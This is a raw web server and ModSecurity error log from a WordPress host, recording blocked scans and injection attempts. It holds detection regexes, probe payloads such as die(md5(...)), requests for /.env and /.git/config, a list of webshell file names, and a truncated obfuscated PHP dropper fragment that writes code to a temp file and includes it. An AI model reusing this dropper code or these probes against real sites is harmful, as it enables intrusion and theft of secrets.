"(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "compatible ; MSIE"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/.env"] [unique_id "Zwh59VoGcAOBJHzmae1EzQAAAM0"] [Fri Oct 11 02:12:24.985473 2024] [:error] [pid 1881:tid 139700706563840] [client 45.227.254.34:53398] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/index.php"] [unique_id "ZwjP2EogRaepj_rTUAT62AAAAII"] [Fri Oct 11 04:29:09.156610 2024] [autoindex:error] [pid 3704:tid 140606860932864] [client 20.197.35.86:55126] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 11 04:29:22.823739 2024] [autoindex:error] [pid 3704:tid 140606785398528] [client 20.197.35.86:55138] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 11 06:27:01.486091 2024] [autoindex:error] [pid 3809:tid 140606760220416] [client 20.192.21.170:56868] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 11 16:40:32.226482 2024] [autoindex:error] [pid 3809:tid 140606894503680] [client 149.50.96.82:42170] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 11 17:03:25.898851 2024] [:error] [pid 3809:tid 140606751827712] [client 139.59.5.55:42550] [client 139.59.5.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:cyborg. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:cyborg: die(md5(4565462));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/index.php"] [unique_id "ZwmgrbsU53uE6U11xDR3kgAAANI"], referer: investigacionperu.com [Fri Oct 11 20:41:29.670341 2024] [authz_core:error] [pid 3809:tid 140606768613120] [client 207.154.212.47:58192] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/11 20:41:34 [error] 3669#3669: *328691 access forbidden by rule, client: 207.154.212.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Oct 12 00:14:34.357080 2024] [authz_core:error] [pid 3703:tid 140606810576640] [client 64.227.70.2:33836] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/12 00:14:39 [error] 3669#3669: *331201 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Oct 12 00:16:27.146999 2024] [autoindex:error] [pid 3809:tid 140606701471488] [client 149.50.96.82:33858] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 13 21:49:59.582123 2024] [authz_core:error] [pid 11941:tid 140459362002688] [client 46.101.111.185:55702] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/13 21:50:05 [error] 11903#11903: *364291 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Oct 13 22:39:17.625357 2024] [autoindex:error] [pid 12750:tid 140459187861248] [client 157.173.114.2:56792] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Oct 13 22:49:10.790110 2024] [autoindex:error] [pid 12750:tid 140459187861248] [client 20.197.35.86:57030] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Oct 13 22:49:24.643886 2024] [autoindex:error] [pid 11941:tid 140459120719616] [client 20.197.35.86:57040] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 14 00:00:35.112300 2024] [authz_core:error] [pid 11941:tid 140459120719616] [client 138.68.86.32:59946] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/14 00:00:41 [error] 11903#11903: *366728 access forbidden by rule, client: 138.68.86.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Oct 14 05:05:48.997329 2024] [:error] [pid 4085:tid 139783284135680] [client 13.36.174.70:40604] [client 13.36.174.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:code_content. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: (!( found within ARGS:code_content: <?php error_reporting(0);goto pp; bk: function tc($zj) { goto rt; rt: $dl = \\x22tempnam\\x22(\\x22sys_get_temp_dir\\x22(), \\x22tmp_func\\x22); goto hq; lj: unlink($dl); goto il; il: return $dm; goto uc; pm: $dm = (include $dl); goto lj; hq: file_put_contents($dl, \\x22<?php {$zj}\\x22); goto pm; uc: } goto dl; pp: function gw($f9) { goto th; gd: $ik = 0; goto t3; xn: ky: goto lt; lt: $ik++; goto gm; us: return $f9; goto zm; z9: if (!($ik < strlen($f9))) { goto ..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accu [hostname "investigacionperu.com"] [uri "/ss.php"] [unique_id "Zwzs_AAClxrs4UJX_xwAtQAAAFQ"], referer: www.google.com 2024/10/15 00:46:22 [error] 19160#19160: *383572 access forbidden by rule, client: 165.22.34.189, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/15 00:46:25 [error] 19160#19160: *383690 access forbidden by rule, client: 139.59.132.8, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/15 00:46:25 [error] 19160#19160: *383692 access forbidden by rule, client: 138.68.82.23, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/15 00:46:26 [error] 19161#19161: *383747 access forbidden by rule, client: 164.90.208.56, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/15 00:46:27 [error] 19160#19160: *383769 access forbidden by rule, client: 139.59.143.102, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/15 00:46:28 [error] 19160#19160: *383800 access forbidden by rule, client: 164.90.208.56, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Tue Oct 15 00:46:32.542094 2024] [authz_core:error] [pid 19323:tid 140108594370304] [client 206.81.24.227:35010] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Tue Oct 15 00:46:32.966293 2024] [authz_core:error] [pid 19239:tid 140108669904640] [client 64.226.78.121:35014] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/15 00:46:37 [error] 19161#19161: *383845 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/15 00:46:38 [error] 19160#19160: *383847 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Oct 15 09:53:59.312022 2024] [:error] [pid 1182:tid 140587835553536] [client 185.104.184.206:41938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Tue Oct 15 09:54:09.254810 2024] [:error] [pid 1180:tid 140587991889664] [client 185.104.184.206:41958] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php [Tue Oct 15 09:54:12.852792 2024] [:error] [pid 1181:tid 140587776804608] [client 185.104.184.206:41966] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/2index.php [Tue Oct 15 09:54:44.963123 2024] [:error] [pid 1794:tid 140587894302464] [client 185.104.184.206:42028] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Oct 15 09:54:46.254391 2024] [:error] [pid 1182:tid 140587743233792] [client 185.104.184.206:42032] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Oct 15 09:55:21.766868 2024] [:error] [pid 1181:tid 140587818768128] [client 185.104.184.206:42106] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Oct 15 09:55:27.588903 2024] [:error] [pid 1181:tid 140587785197312] [client 185.104.184.206:42130] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/sxx.php [Tue Oct 15 09:55:27.692832 2024] [:error] [pid 1181:tid 140587810375424] [client 185.104.184.206:42132] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Oct 15 09:55:37.321640 2024] [:error] [pid 1794:tid 140587827160832] [client 185.104.184.206:42150] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Oct 15 09:55:43.644769 2024] [:error] [pid 1180:tid 140587801982720] [client 185.104.184.206:42162] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/edit.php [Tue Oct 15 09:56:58.819089 2024] [:error] [pid 1794:tid 140587810375424] [client 185.104.184.206:42300] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Oct 15 09:57:45.864792 2024] [:error] [pid 1182:tid 140588000282368] [client 185.104.184.206:42378] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Tue Oct 15 09:57:49.673232 2024] [:error] [pid 1794:tid 140587734841088] [client 185.104.184.206:42386] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/webdb.php [Tue Oct 15 09:58:13.938997 2024] [:error] [pid 1794:tid 140587827160832] [client 185.104.184.206:42434] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Tue Oct 15 09:58:17.149903 2024] [:error] [pid 1794:tid 140587768411904] [client 185.104.184.206:42442] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Oct 15 09:58:31.689464 2024] [:error] [pid 1794:tid 140587751626496] [client 185.104.184.206:42474] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/Darrell168Garcia.php [Tue Oct 15 09:58:32.999501 2024] [:error] [pid 1180:tid 140587885909760] [client 185.104.184.206:42478] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ssl.php [Tue Oct 15 09:58:35.406860 2024] [:error] [pid 1180:tid 140587827160832] [client 185.104.184.206:42488] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Tue Oct 15 09:58:40.224860 2024] [:error] [pid 1794:tid 140587983496960] [client 185.104.184.206:42498] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-sigunq.php [Tue Oct 15 09:58:48.447451 2024] [:error] [pid 1794:tid 140587776804608] [client 185.104.184.206:42516] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Tue Oct 15 09:58:48.550035 2024] [:error] [pid 1182:tid 140587776804608] [client 185.104.184.206:42518] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/rafosul.php [Tue Oct 15 09:58:51.123313 2024] [:error] [pid 1180:tid 140587801982720] [client 185.104.184.206:42524] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Tue Oct 15 09:58:51.123453 2024] [:error] [pid 1180:tid 140587801982720] [client 185.104.184.206:42524] Stack trace: [Tue Oct 15 09:58:51.123476 2024] [:error] [pid 1180:tid 140587801982720] [client 185.104.184.206:42524] #0 {main} [Tue Oct 15 09:58:51.123580 2024] [:error] [pid 1180:tid 140587801982720] [client 185.104.184.206:42524] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Tue Oct 15 09:58:53.459203 2024] [:error] [pid 1180:tid 140587734841088] [client 185.104.184.206:42532] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/doc.php [Tue Oct 15 09:58:59.485387 2024] [:error] [pid 1794:tid 140587734841088] [client 185.104.184.206:42546] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/blurbs.php [Tue Oct 15 09:59:01.991155 2024] [:error] [pid 1180:tid 140587894302464] [client 185.104.184.206:42554] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/doc.php [Tue Oct 15 09:59:04.500510 2024] [:error] [pid 1182:tid 140587801982720] [client 185.104.184.206:42560] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Tue Oct 15 09:59:10.918477 2024] [:error] [pid 1794:tid 140587760019200] [client 185.104.184.206:42574] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Tue Oct 15 09:59:18.945813 2024] [:error] [pid 1180:tid 140587885909760] [client 185.104.184.206:42596] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/classwithtostring.php [Tue Oct 15 09:59:25.357249 2024] [:error] [pid 1180:tid 140587776804608] [client 185.104.184.206:42610] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Tue Oct 15 09:59:28.174875 2024] [:error] [pid 1794:tid 140587810375424] [client 185.104.184.206:42616] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Tue Oct 15 09:59:28.280362 2024] [:error] [pid 1182:tid 140587776804608] [client 185.104.184.206:42618] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/scripts.php [Tue Oct 15 09:59:51.752254 2024] [:error] [pid 1182:tid 140587869124352] [client 185.104.184.206:42694] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Tue Oct 15 09:59:59.272619 2024] [:error] [pid 1180:tid 140587818768128] [client 185.104.184.206:42712] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Tue Oct 15 10:00:19.436802 2024] [:error] [pid 1794:tid 140587734841088] [client 185.104.184.206:42742] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Tue Oct 15 10:00:22.745409 2024] [:error] [pid 1182:tid 140587760019200] [client 185.104.184.206:42750] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Oct 15 10:00:38.078628 2024] [:error] [pid 1182:tid 140587810375424] [client 185.104.184.206:42780] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/aboudt.php [Tue Oct 15 10:00:53.535538 2024] [:error] [pid 1794:tid 140587877517056] [client 185.104.184.206:42808] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Oct 15 10:01:02.168271 2024] [:error] [pid 1181:tid 140587776804608] [client 185.104.184.206:42824] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/baja.php [Tue Oct 15 10:01:04.265341 2024] [:error] [pid 1182:tid 140587991889664] [client 185.104.184.206:42828] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Tue Oct 15 10:01:07.387472 2024] [:error] [pid 1182:tid 140588000282368] [client 185.104.184.206:42836] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shimo.php [Tue Oct 15 10:01:31.059753 2024] [:error] [pid 1794:tid 140587869124352] [client 185.104.184.206:42878] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Tue Oct 15 10:02:12.078886 2024] [:error] [pid 1182:tid 140587810375424] [client 185.104.184.206:42962] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/flower.php [Tue Oct 15 10:02:19.505297 2024] [:error] [pid 1181:tid 140587743233792] [client 185.104.184.206:43000] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wrapper.php [Tue Oct 15 10:02:23.217265 2024] [:error] [pid 1182:tid 140587885909760] [client 185.104.184.206:43012] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/web.php [Tue Oct 15 10:02:23.315842 2024] [:error] [pid 1794:tid 140587902695168] [client 185.104.184.206:43014] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Tue Oct 15 10:02:23.507232 2024] [:error] [pid 1180:tid 140587743233792] [client 185.104.184.206:43016] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index1.php [Tue Oct 15 10:03:43.860310 2024] [:error] [pid 1794:tid 140587877517056] [client 185.104.184.206:43154] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Oct 15 10:03:54.294422 2024] [:error] [pid 1181:tid 140588008675072] [client 185.104.184.206:43174] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Oct 15 10:05:25.082788 2024] [autoindex:error] [pid 1182:tid 140587869124352] [client 185.104.184.206:43324] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:05:27.792087 2024] [autoindex:error] [pid 1794:tid 140587885909760] [client 185.104.184.206:43330] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:05:41.823383 2024] [:error] [pid 1180:tid 140587991889664] [client 185.104.184.206:43356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Tue Oct 15 10:05:50.161016 2024] [:error] [pid 1794:tid 140587743233792] [client 185.104.184.206:43370] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Tue Oct 15 10:06:01.899411 2024] [autoindex:error] [pid 1794:tid 140587885909760] [client 185.104.184.206:43394] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:11.019354 2024] [autoindex:error] [pid 1182:tid 140587835553536] [client 185.104.184.206:43410] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/15 10:06:11 [error] 1137#1137: *388306 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 185.104.184.206, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/10/15 10:06:11 [error] 1137#1137: *388306 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 185.104.184.206, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Tue Oct 15 10:06:12.725973 2024] [autoindex:error] [pid 1182:tid 140587827160832] [client 185.104.184.206:43414] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:16.530038 2024] [autoindex:error] [pid 1794:tid 140587877517056] [client 185.104.184.206:43422] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:17.936330 2024] [autoindex:error] [pid 1794:tid 140587743233792] [client 185.104.184.206:43426] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:18.039465 2024] [autoindex:error] [pid 1794:tid 140587801982720] [client 185.104.184.206:43428] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:18.145375 2024] [autoindex:error] [pid 1794:tid 140587785197312] [client 185.104.184.206:43430] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:18.345297 2024] [autoindex:error] [pid 1794:tid 140587776804608] [client 185.104.184.206:43434] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:18.492303 2024] [:error] [pid 1180:tid 140587760019200] [client 185.104.184.206:43436] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Oct 15 10:06:18.492551 2024] [:error] [pid 1180:tid 140587760019200] [client 185.104.184.206:43436] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Oct 15 10:06:18.492720 2024] [:error] [pid 1180:tid 140587760019200] [client 185.104.184.206:43436] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Oct 15 10:06:18.492897 2024] [:error] [pid 1180:tid 140587760019200] [client 185.104.184.206:43436] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Oct 15 10:06:18.639439 2024] [autoindex:error] [pid 1181:tid 140587835553536] [client 185.104.184.206:43438] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 15 10:06:18.740714 2024] [autoindex:error] [pid 1180:tid 140587743233792] [client 185.104.184.206:43440] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching 